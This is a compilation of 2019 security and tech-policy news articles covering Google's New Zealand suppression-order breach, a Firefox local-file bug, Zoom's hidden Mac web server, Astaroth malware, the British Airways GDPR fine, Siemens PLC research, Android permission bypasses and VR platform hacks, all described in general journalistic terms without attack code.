STE WILLIAMS

After violating a court suppression order and publishing a murder suspect’s name, Google has suspended its Trends alert emails in New Zealand.

In New Zealand, among other countries, the right to a fair trial includes a court’s being able to order people and organizations to refrain from publishing suspects’ names.

Google didn’t do that. It says it didn’t even mean to, but its Google Trends alerts went ahead and emailed out links to a media report that included the murder suspect’s name.

A few days after the December 2018 murder of British backpacker Grace Millane, Google had sent an email to anyone signed up for its “what’s trending in New Zealand” alert. After Google’s news-gathering algorithm picked up a British newspaper’s report of the suspect’s court appearance, it automatically forwarded the story to all subscribers, including the name of the accused killer in the subject line.

That action violated a suppression order prohibiting publication of the suspect’s name or identification details. Google’s violation sparked outrage in New Zealand, which, with its low serious-crime rate, had been shocked by the murder of the young tourist, believed to have been killed the night before her 22nd birthday.

According to a furious letter published by NZ Minister of Justice Andrew Little last week, when he met with Google representatives six months ago, Google said that the company took the issue seriously and that they’d look into what they could do to fix the problem.

Six months later, according to Little, Google said that the answer to “what can be done to stop this” amounted to “nothing.”

When I confronted New Zealand Google executives about what happened they indicated they took the issue seriously and would look at what they could do to fix the problem. Six months on, they now tell me they can’t – or won’t – do anything.

Really? A company that big can’t figure out how to fix “an obvious risk to justice systems?”, Little said. Sorry, that doesn’t cut it:

I would be failing in my duty if, as a minister of justice in a small country, I threw in the towel and decided nothing could be done in the face of a giant international corporation thinking it could ride roughshod over one of the most important principles of criminal justice.

Little also tweeted out a video clip showing his computer search for the words “don’t be evil,” followed by his text selection of the words “Google’s corporate code of conduct” in a Wikipedia entry.

.@Google, don’t be evil. https://t.co/OBPo8ub5rQ

—
Andrew Little (@AndrewLittleMP) July 03, 2019

“Don’t be evil” is, of course, the much-mocked motto that Google dropped back in 2015 when it became Alphabet and decided instead to “Do the Right Thing.”

Little said in his video that, based on the alert, a newspaper had published the prohibited material:

We’ve had a situation where, in a very important trial – the Grace Millane case – a newspaper, helped by Google, has published information that the judge said was suppressed.

Two days after getting scolded by Little, Google sent him a letter saying that the violative email went out to fewer than 200 subscribers.

In the letter, Ross Young, Google’s government affairs and public policy manager, reiterated that the company has a webform in place where court orders can be submitted, saying that it had taken immediate action after to prevent a recurrence of the mistake. Unfortunately, that didn’t happen until four days after the Trends alert was sent.

Little hadn’t been sympathetic to the “nobody told us about the court order” line of defense. It’s up to Google to figure out how to comply, and it shouldn’t be all that hard, given that news outlets manage to do it, he said. From Little’s letter:

One of the issues Google has raised is they don’t know what suppression orders are in force in New Zealand at any time. This doesn’t stop New Zealand based publishers from adhering to the law but I have asked the Ministry of Justice to review how it notifies media about suppression orders as part of its work to implement the new contempt laws.

Young said that Google respects New Zealand law and understands the “sensitivity around this issue”. To ensure that it doesn’t happen again, Google said, it’s suspending Google Trends emails in New Zealand:

In light of the concerns you expressed this week, Google has …suspended Google Trends emails about searches trending in New Zealand. This means that people will no longer receive emails on any trending searches for New Zealand and provides even further assurance against any recurrence.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/m0sLNWJkp-U/

Mozilla has been sitting on a new variant of an age-old flaw for almost a year, even with public disclosure happening back in January.

The issue, disclosed by Dr Vladimir Bostanov of SySS GmbH on 16 January 2019 months after he’d privately reported it to Moz in July 2018, relies on an old implementation of Same Origin Policy (SOP) for the file URI.

Getting the browser to read local files is nothing particularly new – those born around the time of the first report are probably thinking about learning to drive around now.

To be fair, as Mozilla’s security lead Daniel Veditz told us: “That’s how all browsers worked back then. Firefox was the first to move to stricter handling in 2008 with Firefox 3, but even that was not as strict as we wanted it to be due to compatibility issues.”

A more recent report, which came in seven years ago, highlighted the issue once again.

Back then, the worry was that this was a valid use case for Firefox and that fixing it would break some existing applications (for example, HTML documentation).

Significantly, however, it was also observed that Google had done things a little differently with Chrome and applied a more restrictive security policy to file://, with every file treated as a different origin. Firefox, of course, allowed files to access elements in the same directory.

Chrome has long since eclipsed Firefox both in usage and significance so the “but it will break things” excuse for not tightening stuff up is a tad redundant.

As Veditz observed: “Chrome leapfrogged into even stricter behavior and we are now following suit.”

It’s a direct(ory) hit

Bostanov’s report shows a new twist on the implementation. It was thought that hackers needed to know the name of a file in order to steal it, but a bug in Mozilla’s implementation means that malicious code can grab an entire directory listing. The contents of the files in the list can then be slurped and dumped on an attacker’s server.

Admittedly, a bit of social engineering is required.

Bostanov suggests a scenario where a user is persuaded to download a malicious HTML file through the usual tricks (“Click here for your free iPad!”) and then opens the file using file manager or similar. Firefox opens the file, and shows a directory listing and a message saying something along the lines of the file is being “protected” and must be opened in “safe mode”. The user clicks the link to the file to do so, and hey presto – some naughty JavaScript swoops in and slurps every file in the same directory.

Another researcher, Barak Tawily, posted a similar exploit to Mozilla’s Bugzilla tracker two weeks ago. Tawily used clickjacking to further conceal the full horror from the user, but the underlying issue is the same. Tawily’s approach was highlighted last week in The Hacker News.

To demonstrate the issue, Bostanov’s team created a proof of concept. We’d advise caution in using it – at the very least, create some dummy files in a folder you can easily blow away.

Seeing those files turn up on someone else’s server after a few innocuous mouse-clicks is sobering for sure. We used Firefox 67.0.4 in Windows 10 and can confirm the exploit works as advertised.

While Bostanov had praise for Tawily (describing him to The Register as “a solid pentester”), Mozilla came in for some flack from the researcher. After all, that directory listing bug had been raised last year.

Awoogah! Awoogah! Firefox fans urged to update and patch zero-day hole exploited in the wild by miscreants

READ MORE

Bostanov told us that he struggled to get a response from bugzilla.mozilla.org, saying: “They almost never talked to me – they talked among themselves without reacting to my posts.” He described the discussion as “interesting and productive”, but added: “I could not participate – whatever I wrote elicited no response.”

And so the bug lingered on, with Tawily the latest to flag it up.

Bostanov’s team are all Firefox users, and he had some kind words for the foundation. “I admire Mozilla. I think what they do is great… So, as users, we are very interested in its improvement.”

It’s been a tough few months for the veteran browser as its efforts to stem the seemingly unstoppable rise of Chromium have foundered with an expired extensions certificate annoying users in May followed by a zero-day exploit in June. Mozilla is also pondering a “premium” service as a way of bolstering its revenues.

There is good news, however: the browser maker told us: “We are currently updating the security model to ensure that files sent to users cannot expose their local files. The patch will be shipped within the next few days.” ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/mozilla_firefox_local_files_bug/

Zoom Video Communications, whose web conferencing service is used by millions, is under fire for installing a hidden web server on Macs in order to bypass user consent when joining a meeting.

Researcher Jonathan Leitschuh, a member of the security team at Gradle Inc, investigated how the Zoom client opens automatically when you receive a meeting link.

Leitschuh discovered that when you install Zoom on a Mac, it installs a web server on port 19421. If you then click on a Zoom conferencing link, the page loads an image from the web server on localhost, where the size of the image returned represents a status code – a hack to get around CORS (Cross-Origin Resource Sharing) restrictions which apply to Ajax requests.

The result is that you can get a user to join a Zoom call simply by embedding a Zoom link into a website, for example, by using an iframe (inline frame). The user sees an ordinary web page URL but the iframe loads the Zoom link automatically.

The default Zoom configuration leaves it to the host to determine whether or not the camera is automatically enabled. Therefore, an attacker can view the user’s webcam simply by persuading them to visit the attacker’s site.

As Leitschuh observes, the consequences could be more serious if there are other exploitable vulnerabilities in the Zoom client – such as the “Zoom Unauthorized Command Execution” bug – which Tenable reported in November 2018 but is now fixed.

Just to save a click?

Leitschuh reported the problem to Zoom, along with a related denial-of-service vulnerability. He was offered a financial bounty, which he declined, because it was conditional on never publicly disclosing the bugs.

Zoom responded by changing the host’s ability to choose whether the camera is enabled – but the fix regressed and Leitschuh also found that the iframe workaround mentioned above bypassed it.

There are further concerns. One is that even if you uninstall Zoom on the Mac, it leaves the Zoom web server in place. The web server has the ability to reinstall the Zoom client, rendering the uninstall attempt ineffective. This ability is also a security incident waiting to happen, since if an attacker managed to gain control of one of the allowed domains for downloading the client, it could install some other executable.

“To shut down the web server, run lsof -i :19421 to get the PID of the process, then do kill -9 [process number]. Then you can delete the ~/.zoomus directory to remove the web server application files,” Leitschuh explained.

Zoom has made two statements about the matter. In a blog post, Richard Farley, Zoom’s chief information security officer, said that Zoom users can set a preference for video on or off when joining a meeting. “The host or any other participant cannot override a user’s video and audio settings to, for example, turn their camera on.”

This is not inconsistent with what Leitschuh claims. The host does determine whether or not the participant’s camera is on, but this is subject to the user’s preferences. As ever, the majority of users accept the defaults, so if the default is ON then video will be on. A clean install of Zoom will indeed have this setting, though it is reversed, which means you have to check “Turn off my video when joining meeting” to avoid it.

This setting, which defaults to ON, controls whether a Zoom meeting has video automatically enabled

Further, Farley justifies installing the web server even though this is specifically to bypass a security feature introduced by Apple in Safari 12, writing:

When Zoom is installed on a Mac device by the user, a limited-functionality web server that can only respond to requests from the local machine is also installed on the device. This is a workaround to a change introduced in Safari 12 that requires a user to confirm that they want to start the Zoom client prior to joining every meeting. The local web server enables users to avoid this extra click before joining every meeting. We feel that this is a legitimate solution to a poor user experience problem, enabling our users to have faster, one-click-to-join meetings. We are not alone among video conferencing providers in implementing this solution.

The company also issued a public statement (PDF) with a similar claim that installing a local web server is a reasonable workaround “to avoid this extra click before joining a meeting”. The statement adds that a July update will add a feature to “apply and save the user’s video preference from their first Zoom meeting to all future Zoom meetings”.

This does not sound like a full solution.

What about Windows users? No hidden web server perhaps; but that is because on Windows the “extra click” is not needed. The meeting opens automatically, with video (tested in Firefox, Chrome and Edge), provided the browser has set the association with .zoommtg links – a once-only operation. Depending on preferences, you might also get a conference options prompt in front of the meeting, but you have already joined. Whether browsers should allow this without a further prompt is a moot point, and one which Apple attempted to fix in Safari.

If you do not like this behaviour, remove the association with .zoommtg in your browser. For example, here is the setting in Firefox:

Click to enlarge

The Mac web server running on localhost is an extra security risk, though, especially as it has an unpublished API. An attacker could have an IMG tag on a page, for example, set to a src=URL on your Zoom web server. It is hard to understand how Zoom’s security officer can justify risks like these in the name of avoiding “poor user experience”. On the other hand, this does demonstrate the lengths to which a company will go to achieve a slight advantage in ease of use, never mind the consequences.

Security-conscious Mac users may want to remove all traces of Zoom at least until the risks are better understood. Tape over the camera? Maybe. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/zooms_hidden_mac_web_server_allows_autojoin_conferencing_exploit/

Microsoft’s latest official Windows 10 update, OS Build 18362.207, from June 27, 2019, can potentially break your VPN. But it probably won’t because it’s an edge case that can be expected to affect very few people.

We saw some signal flares raising the alarm and, upon looking into the issue, it’s clear there’s less than meets the eye to this piece of information. You can carry on until an actual emergency arrives.

What’s this? I need my VPN. What’s going on?

Recently, Microsoft published an update detailing incremental improvements to its May Windows 10 (version 1903) and Windows Server (version 1903) releases. The note about the optional update includes an ominous warning:

“The Remote Access Connection Manager (RASMAN) service may stop working and you may receive the error ‘0xc0000005’ on devices where the diagnostic data level is manually configured to the non-default setting of 0.”

What’s the Remote Access Connection Manager?

As its name suggests, it manages dial-up and virtual private network connections between a Windows computer and a remote network, like the internet or a corporate network. So if RASMAN stops working, you may find yourself in airplane mode and struck with reading local files.

Er, I don’t use dial-up.

We don’t know anyone who does either, although in more distant areas of the US untouched by US network providers it still is. While we have fond memories of screeching modems negotiating to establish a 300 baud connection now most of us just have the silence of the LANs.

Azurely not! OpenVPN support and NetApp Files among new toys for Microsoft’s cloud

READ MORE

But I do use a VPN. Should I worry?

Probably not. Per Microsoft’s note, “This issue only occurs when a VPN profile is configured as an Always On VPN (AOVPN) connection with or without device tunnel. This does not affect manual only VPN profiles or connections.”

AOVPN debuted in Windows Server 2016. So if you’re using another version of Windows, this isn’t for you. And if you haven’t changed the default RASMAN diagnostic data level setting to something other than 0, there’s no issue.

OMG, I am on Windows Server 2016 and I am using AOVPN with a non-zero diagnostic setting! Can I curse Microsoft now?

Don’t let us stop you from exercising your lungs or typing fingers on behalf of a worthy cause. But at least in this instance, as Microsoft notes above, if the issue involves AOVPN, your administrator can switch to a manual connection as a workaround. But seeing as you’re working in an enterprise environment where it can be months or years before updates get deployed, you probably aren’t using the affected version or Windows 10 yet.

And by the time you are, the bug is likely to be fixed – Microsoft says, “We are working on a resolution and estimate a solution will be available in late July.” ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/08/windows_10_vpn_bug/

Microsoft has lifted the lid on the inner-workings of a particularly nasty piece of fileless malware that aims to pilfer user data without needing to install software on the victim’s machine.

Dubbed Astaroth – the same name as the Great Duke of Hell – the software nasty has been in circulation since 2017 and has primarily been used to steal data from companies in South America and Europe via targeted attacks launched through spear-phishing.

What makes the infection unique, says Microsoft Defender APT research team member Andrea Lelli, is its ability to fly under the radar of traditional antivirus products by operating without ever needing to install an executable on the victim’s machine.

“Astaroth is a notorious info-stealing malware known for stealing sensitive information like credentials, keystrokes, and other data, which it exfiltrates and sends to a remote attacker,” Lelli explained today.

“The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.”

Typically, the attack begins when a victim opens a link inside a spear-phishing email. That link, in turn, opens up a shortcut file to a terminal command that downloads and runs JavaScript code. The JavaScript now pulls and runs two DLL files that perform the dirty work of logging and uploading the victim’s information while disguising itself as a system process.

This procedure is highly effective against traditional signature-based detection tools because, throughout the process, nothing other than the DLL files are actually downloaded or installed. Thus there is little opportunity to scan or catch the attack.

It is also an approach that has let Astaroth thrive since late 2017 without having to rely on vulnerability exploits or traditional trojan downloaders.

“For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded—after all, every executable used in the attack is non-malicious,” said Lelli.

“If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.”

To catch the malware, Lelli says, Microsoft and other vendors have had to rely on their heuristic detection tools. In particular, AV tools need to be closely monitoring the use of WMIC command-line code and applying rules when loading DLL files – such as checking the age of a file and flagging or blocking newly-created DLLs from running. When you know what you are looking for, Lelli explains, fileless malware isn’t particularly hard for newer security tools to catch.

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software,” the Redmond security bod writes.

“On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.” ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/08/microsoft_astaroth_examination/

This is the first formal step in writing the standards that will guide the implementation of AI technologies within the federal government.

The National Institute of Standards and Technology (NIST) has issued a draft guideline for developing artificial intelligence (AI) technical standards, the first major, formal step in writing the standards that will guide the procurement and implementation of AI and machine learning technologies within the federal government. And because many private organizations base their decisions on NIST documents, those standards could have repercussions that reach far beyond government purchasing.

Within the draft guideline are sections that deal with a wide variety of topics around AI, including how AI applications are developed, how AI is explained to stakeholders and the public, and how AI applications are used. Security plays a role in several aspects of the proposal, from how to build “trustworthy” AI applications to ensuring that AI’s use takes both proper security and proper concern for privacy into account.

The NIST Guideline has been developed as part of the response to the American AI Initiative, established by executive order in February. Within five key areas of emphasis set out in the order, one called for NIST “to lead the development of appropriate technical standards for reliable, robust, trustworthy, secure, portable, and interoperable AI systems.” Formal comments on the draft are being accepted through July 19.

For more, read here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/nist-sets-draft-guidelines-for-government-ai/d/d-id/1335165?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The penalty is a sign of things to come, say experts.

British Airways is facing a £183 million (US$229 million) fine for a June 2018 data breach — the largest fine to date under the European Union’s General Data Protection Regulation (GDPR).

According to a statement issued today, the Information Commissioner’s Office (ICO) of the United Kingdom said it notified British Airways of its intent to levy the penalty for the company’s security failings, which led to a half-million customers’ information being harvested by a fraudulent site. The information commissioner for the UK warned that other companies could face similar penalties unless they better protect UK citizens’ information.

“When an organization fails to protect [people’s personal data] from loss, damage, or theft, it is more than an inconvenience,” said Elizabeth Denham, the UK information commissioner, in a statement. “That’s why the law is clear — when you are entrusted with personal data, you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”

GDPR went into effect in May 2018, the same year both Equifax and Facebook were fined £500,000 by the UK for their violations of citizens’ privacy due to the 2017 Equifax data breach and early 2018 Cambridge Analytica scandal.

Under GDPR, the fines would have been much higher. The current penalty against British Airways is 1.5% of the company’s 2018 revenue of £13.0 billion (US$16.3 billion). EU nations’ privacy commissioners can fine companies up to 4% of their annual revenues for the previous financial year, depending on the severity of the infringement.

“They have been fined 1.5 percent of their worldwide turnover in 2017, which is near the 2 percent maximum fine,” said Guy Bunker, chief technology officer at cybersecurity company Clearswift, in a statement. “The good news is that the breach was picked up relatively quickly. BA has systems in place such that it could narrow down both how the incident happened and who was affected.”

British Airways publicly announced the breach on September 6, 2018, stating that attackers were able to harvest data from its site during the payment process. The company claimed at the time that the breach only affected customers between August 15, 2018, and September 5, 2018. 

The fact that the attackers stole information directly from the payment forms suggests the attack was linked to the MageCart group, which is also blamed for a breach earlier in 2018 of Ticketmaster’s site, according to a September analysis of the attack by security firm RiskIQ.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer, which grabbed forms indiscriminately,” said Yonathan Klijnsma, RiskIQ head researcher and report author, in the analysis. “This particular skimmer is very much attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

Companies need to be on guard against such attacks. Unfortunately, less than 60% of all companies are currently meeting all, or most, of the GDPR’s requirements, according to Cisco’s 2019 “Data Privacy Benchmark Study.” Almost 90% of companies expect to be meeting the requirements within the next year, the report points out.

Cisco did find companies that are GDPR-compliant have fewer data breaches, are able respond to data breaches faster, and are ultimately less impacted by the breaches that do happen. 

“If a business the size of BA can be found wanting, smaller companies should be asking themselves whether their data security arrangements are up to scratch,” said Susan Hall, an IT and data protection specialist lawyer and partner at Clarke Willmott, in a statement. “This reinforces the importance for businesses of having robust terms and conditions with anyone to whom they contract website development and hosting, and of carrying out penetration testing and constant security monitoring of all interfaces through which attacks can be launched.”

The ICO notice is not a final determination. The agency will allow British Airways and other groups to comment before committing to the fine, ICO Commissioner Denham said. 

“Under the GDPR ‘one-stop-shop,’ provisions, the data protection authorities in the EU whose residents have been affected will also have the chance to comment on the ICO’s findings,” she said. “The ICO will consider carefully the representations made by the company and the other concerned data protection authorities before it takes its final decision.”

Related Content:

• British Airways Breach Linked to Ticketmaster Breach Attackers
• Over 59K Data Breaches Reported in EU Under GDPR
• Getting Up to Speed on Magecart
• GDPR Oddsmakers: Who, Where, When Will Enforcement Hit First?
• Former Equifax CIO Sentenced to Prison for Insider Trading

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

 

 

 

 

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/britain-looks-to-levy-record-gdpr-fine-against-british-airways/d/d-id/1335166?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Black Hat USA session will reveal how they reverse-engineered the proprietary cryptographic protocol to attack the popular programmable logic controller.

A group of security researchers in Israel has discovered vulnerabilities in the Siemens S7 Simatic architecture that ultimately allowed them to build a phony engineering workstation that was able to dupe — and alter — operations of the S7 programmable logic controller (PLC) that runs industrial processes.

Eli Biham and Sara Bitan of Technion, and Avishai Wool and Uriel Malin of Tel Aviv University, at Black Hat USA next month in Las Vegas will reveal security weaknesses they found in the newest generation of the Siemens systems and how they reverse-engineered the proprietary cryptographic protocol in the S7.

Their rogue engineering workstation poses as the so-called TIA engineering station that operates with the Simatic S7-1500 PLC, which in turn interfaces with and runs the industrial system or process. It can remotely start and stop the PLC via the newly found flaws in the Siemens communications architecture, potentially wreaking havoc on an industrial system or process, according to the researchers. They were able to wrest those controls from the PLC by surreptitiously downloading rogue command logic to the S7 PLC.

They hide the rogue code so that a process engineer could not see it: If the engineer were to check the code, he or she would only see the legitimate PLC source code, unaware of the malicious code running in the background and issuing rogue commands to the PLC.

“You could have some disruption in the physical process,” explains Wool, a professor at Tel Aviv University’s School of Electrical Engineering.

The research — details of which the researchers won’t disclose until their talk at Black Hat — combined deep-dive studies of the Siemens technology by teams at both Technion and Tel Aviv University. Their findings demonstrate how a sophisticated attacker could abuse Siemens’ newest generation of industrial controllers that were built with more security features and more secure communication protocols.

Siemens doubled down on industrial control system (ICS) security in the aftermath of the infamous Stuxnet attack, where its older controllers were targeted in a sophisticated attack that ultimately sabotaged centrifuges in the Natanz nuclear facility in Iran. Siemens was one of the first ICS/SCADA vendors then to step up and build secure software development programs as well as roll out new products with built-in security features such as firewalls and VPNs.

The industrial systems vendor now also offers managed security services, including monitoring, incident response, and management, to the industrial sector.

Siemens confirmed that it has been working with the researchers, who have shared the details of their findings with the vendor. “Siemens is aware of the findings, has been working with the researcher, and will provide further information as it becomes available via Siemens ProductCERT,” a Siemens spokesperson said.

Meanwhile, the researchers for now recommend layers of firewalls, access controls, and closing off any Internet connections to the S7s as a defense to such attacks on the PLCs.

Related Content:

• New Twist in the Stuxnet Story
• Stuxnet, the Prequel: Earlier Version of Cyberweapon Discovered
• Anatomy of a ‘Cyber-Physical’ Attack
• PLC Worms Pose Stealthy Threat to Industrial Systems 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register. 

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/researchers-poke-holes-in-siemens-simatic-s7-plcs-/d/d-id/1335168?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers find more than 1,000 apps in the Google Play store that gather personal data even when the user has denied permission.

App publishers like consumer data so much that they’re willing to go to great lengths to get it — even when those lengths involve ignoring or working around the consumer denying them the right to that data.

At the Federal Trade Commission’s PrivacyCon 2019, held in June, researchers from the International Computer Science Institute (ICSI) presented data showing that as many as 1,325 Android apps were gathering data from devices, even after the device owners had denied such permission to the apps.

The data presented at the conference is based on earlier work the researchers presented at the Usenix Security Symposium in February. In that paper, titled “50 Ways to Leak Your Data,” the team of researchers from UC Berkeley, AppCensus, and Universidad Carlos III de Madrid examined more than 88,000 Android apps to see how they captured, used, and stored customer data. They found that Android apps employ a number of techniques for gathering data that the user may believe is private.

As an example, the researchers pointed to photography apps that scrape the GPS data from photographs to obtain location information after the user has denied the app the right to gather location data. Other apps inferred location information by gathering the MAC address of Wi-Fi routers the device was connected to rather than directly polling for location information.

“Apps capturing and using data in unintended ways is not new and has been a problem since the first smartphone app was introduced,” says Chris Morales, head of security analytics at Vectra. “The smartphone market moved so quickly, the goal of the OS manufacturer was to ensure they had a large enough volume of apps to be relevant in the market. Security was not a primary driver and we find the OS manufacturers now having to clean up the after effects of fast growth in the app store.”

According to Google, that cleanup will extend into the next major Android release. While researchers notified the company of the privacy issue in September, Google has said that it won’t address the “side-channel” information gathering until the release of Android Q, scheduled for October 2019.

Until Android Q is available, those using Android phone will simply have to be careful about the apps they install, even when those apps are downloaded from Google Play. Terence Jackson, CISO at Thycotic says, “Data privacy is all the rage now, GDPR, CCPA, LGPD, just to name a few. But this story highlights the importance of app store owners to implement a more Zero Trust model toward their developers and implement ongoing strategies to evaluate application security.”

Related content:

• New ‘WannaHydra’ Malware a Triple Threat to Android
• Researchers Finds Thousands of iOS Apps Ignoring Security
• Adware Hidden in Android Apps Downloaded More Than 440 Million Times
• New Android Trojan Targets 100+ Banking Apps

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/endpoint/android-app-publishers-wont-take-no-for-an-answer-on-personal-data/d/d-id/1335169?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Hackers just infiltrated virtual reality (VR), enabling them to manipulate users’ immersive 3D worlds.

At the Recon cybersecurity show in Montreal, researchers Alex Radocea and Philip Pettersson demonstrated how to hack virtual reality worlds on three platforms.

• The first was VR Chat, a virtual chat room available via online gaming platform Steam and Facebook-owned Oculus.
• The second was Steam’s own Steam VR platform, which provides games designed for VR and also allows users to play traditional games on a giant virtual screen.
• Finally, High Fidelity, an open source VR system with its own blockchain-based digital currency, got the hacking treatment.

Hacking an immersive VR world enables an attacker to take complete control of the victim’s virtual world, Radocea and Pettersson warned. An attacker can listen to what the victim is saying, and can also create fake images.

What kinds of real-world attacks could someone engineer in a VR world? In the hacking demonstration, the researchers opened the Calc.exe Windows program, which is a common way to demonstrate that you can run arbitrary code on a system. In most demonstrations, this would just appear on the desktop, but in this case, it replaced one of the VR users’ hands like a giant sticky note that they couldn’t get rid of.

Attackers could irritate VR users or perhaps push inappropriate images to chatroom users, and they could eavesdrop on conversations. The real dangers though are probably more traditional. Using a VR chatroom to execute remote code on a target platform is serious enough.

According to one show attendee, the researchers also opened a Meterpreter shell. Meterpreter is part of the Metasploit exploitation framework, which penetration testers use to find flaws in client systems. It’s an interactive command line shell that they can use to remotely communicate with target systems.

On the VR Chat and Steam VR platforms, the researchers figured out a way to take control of the victims’ system by inviting them into a chat room. Any user visiting a chat room would encounter the exploit, which would then infect their machines. Because joining a chatroom is so simple to do, it means that they could compromise many computers in short order. A program could automatically invite all of a compromised user’s contacts into the chatroom, creating a worm that would spread quickly, they warned.

This isn’t the first time people have successfully hacked VR systems. In February 2019, researchers at the University of New Haven discovered vulnerabilities in Bigscreen, a VR environment that allows people to club together in virtual rooms and collaborate on massive virtual screens or watch movies together. That hack enabled the researchers to gatecrash private rooms while remaining invisible in what they called a ‘man in the room’ attack. They could turn on users’ microphones and listen to private conversations, and – just as Radocea and Pettersson demonstrated – create replicating worms that infect users as soon as they enter a room. It could also download and run programs, including malware, onto users’ computers.

Radocea and Pettersson disclosed the most recent bugs responsibly and all of the vulnerable platforms put a fix in place.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/miOW6FanYj4/